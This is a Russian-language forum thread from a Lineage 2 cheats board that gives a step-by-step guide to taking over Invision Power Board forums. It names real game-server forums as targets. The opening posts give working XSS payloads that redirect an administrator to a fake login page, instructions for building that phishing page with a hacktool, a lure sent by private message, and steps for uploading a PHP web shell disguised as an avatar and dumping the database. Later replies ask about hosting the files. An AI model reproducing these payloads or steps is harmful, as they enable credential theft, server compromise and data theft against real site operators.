Добро пожаловать на la2shara. У нас на фруме вы найдёте м...

[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Форум » Баги и читы Lineage 2 » Ломаем сервера Lineage2. » Взлом БД через форум с xss
Взлом БД через форум с xss
6e36aweHHbluДата: Четверг, 03.06.2010, 18:52 | Сообщение # 1
Генералиссимус
Группа: Администраторы
Сообщений: 229
Награды: 6
Репутация: 10032
Статус: Offline
[hide=20]Для начала давайте разберемся что нам это даст?
1)Стать админом а больше ничего и ненадо)

Вообщем я нашёл способ взлома сайта а там и бд, через форум ipb с применением xss.[/hide]

[hide=20]Что такое xss?

Code
XSS (англ. Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером страницы по какой-то причине попадают пользовательские скрипты. Специфика подобных атак заключается в том, что вместо непосредственной атаки сервера они используют уязвимый сервер в качестве средства атаки на клиента.[/hide]
[hide=20]Иногда для термина используют сокращение «CSS», но чтобы не было путаницы с каскадными таблицами стилей, используют сокращение «XSS».Сейчас XSS составляют около 15 % всех обнаруженных уязвимостей[1]. Долгое время программисты не уделяли им должного внимания, считая их неопасными. Однако это мнение ошибочно: на странице или в HTTP-Cookie могут быть весьма уязвимые данные (например, идентификатор сессии администратора). На популярном сайте скрипт может устроить DoS-атакy.

[hide=20]Работает везде где имееться тег acronym в ipb
Пример популярных серверов:http://forum.asterios.tm/ (уже не актуально)

XSS работал бы и на шоках но там слишком длиные сообщения запрещены(в подписи) а в сообщение эти теги отключены.[/hide]

[hide=20]Создаем фейк.
Для начала нам нужно скачать ArxWFakeGen (Антивирус скажет что там вирус, но не пугайтесь это hactool)
Распаковываем, запускаем:
1)В поле страница пишем путь к странице авторизации форума. Пример:http://forum.la2mega.com/index.php?act=Msg&CODE=03&MSID=773&VID=in
2) В поле переадресация делаем на главную. Пример:http://forum.la2mega.com/
3)Где тип базы выберите "Своя" и вместо base3124.dat пишим pass.txt (ну или другое название типа password.txt key.txt lol.txt и т.д.)
4)В поле тип главной выберите htm
5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотретьздесь
Очень часто прога создает ошибки в фейке и у вас не отображаются картинки, для этого открываем index.htm текстовым файлом ищем строчки:

Code
<style type="text/css" media="all">

@import url(http://forum.la2mega.com/http://forum.la2mega.com/style_images/css_2.css);

</style>
[/hide]

[hide=20]И убираем лишний адрес
В итоге должно получиться так:

Code
<style type="text/css" media="all">

@import url(http://forum.la2mega.com/style_images/css_2.css);

</style>

Сохраняем и фейк готов!

Фейк мы приготовили. Пример: http://l2fan-day.ru.freehostia.com/
Теперь нам нужно приготовть xss.[/hide]

Код xss выглядит таким образом:
1) Для ie & firefox

Code
[acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://mail.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]_]___________________________________________________________________________[/acronym]_[/acronym][/size][/color]

2) Для opera:

Code
[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://mail.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

Пример с оперой: http://forum.la2mega.com/index.php?showuser=791
Вместо http://mail.ru/ вам нужно вставить свою ссылку на фейк. И у вас должно получиться что то вроде этого:

Code
[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://l2fan-day.ru.freehostia.com/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]
 
6e36aweHHbluДата: Четверг, 03.06.2010, 19:10 | Сообщение # 2
Генералиссимус
Группа: Администраторы
Сообщений: 229
Награды: 6
Репутация: 10032
Статус: Offline
[hide=20]Чтобы небыло видно лучше всего скрыть цветом.

Код мы приготовили теперь нужно его вставить в подпись, для этого идем в кабинет, переходим в подпись и вставляем код.

Теперь нужно поймать админа, для этого пишем ему в ЛС что либо про донат и т.д. и т.п.

Код работает таким образом. Когда админ переходит на ваше лс (личное сообщение) открывается ваш фейк с адресом форума (Оо). То есть админ не впалит вас что это фейк а подумает что нить про куки и т.п.
Когда же админ зайдет снова в ваше ЛС фейк больше НЕ ОТКРОЕТЬСЯ ^^, при переходе на фейк он получит куки в виде ibp_my=1234 и пока есть этот кук переадресовывать на фейк не будет. Но как же сделать чтобы куки стерались через 24 часа?

setTime(getTime()+30*24*60*60*1000)
Красным выделено количество дней, в течение которых кука будет храниться в браузере юзера.(Вам нужно изменить это в коде)
Вот админ прочитал наш лс мы получили его пасс. Что делать дальше?А дальше мы идем в админку http://ваш форум/admin/
Есть несколько способов залить шелл:
1) Через аватар
2) Через sql
3) Через настройки форума

Первый наиболее легки поэтому я вам про него расскажу.
В админке идем Форумы->Прикрепляемые файлы->Типы файлов
жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да. Топаем в свой профиль:
http://site.ru/index.php?app=core&mo...rs&area=avatar

грузим аву-шелл с расширением php3, смотрим адрес вашего аватара переходим по нему и получаем шелл.

Далее залазим в самый корень и ищем config файл с логин и пассом от мускула, ну а дальше подключаемся сливаем бд и т.д.[/hide]

©m0nk

 
PACCBETДата: Среда, 30.06.2010, 13:04 | Сообщение # 3
Рядовой
Группа: Пользователи
Сообщений: 19
Награды: 0
Репутация: 41
Статус: Offline
Обьясни как все три файла залить на фтп в одну ссылку?
архивнуть?
и вместо мэила надо вставлять ссылку на фейк как я понял?
 
VasiaДата: Пятница, 02.07.2010, 14:48 | Сообщение # 4
Vasek
Группа: Администраторы
Сообщений: 91
Награды: 3
Репутация: 120
Статус: Offline
заливаем все 3 файла на хостинг какойнибудь
 
PACCBETДата: Вторник, 10.08.2010, 18:15 | Сообщение # 5
Рядовой
Группа: Пользователи
Сообщений: 19
Награды: 0
Репутация: 41
Статус: Offline
ну если залить все 3 файла, их только по очереди можно, то будут 3 ссылки уже

Добавлено (10.08.2010, 18:15)
---------------------------------------------
отзовитесь кто

 
SilverBreakerДата: Четверг, 12.08.2010, 19:42 | Сообщение # 6
Рядовой
Группа: Пользователи
Сообщений: 16
Награды: 1
Репутация: 24
Статус: Offline
подскажите любой хостинг?
 
SONARIДата: Вторник, 17.08.2010, 12:36 | Сообщение # 7
Рядовой
Группа: Пользователи
Сообщений: 6
Награды: 0
Репутация: 0
Статус: Offline
хорошая темка
 
Форум » Баги и читы Lineage 2 » Ломаем сервера Lineage2. » Взлом БД через форум с xss
  • Страница 1 из 1
  • 1
Поиск: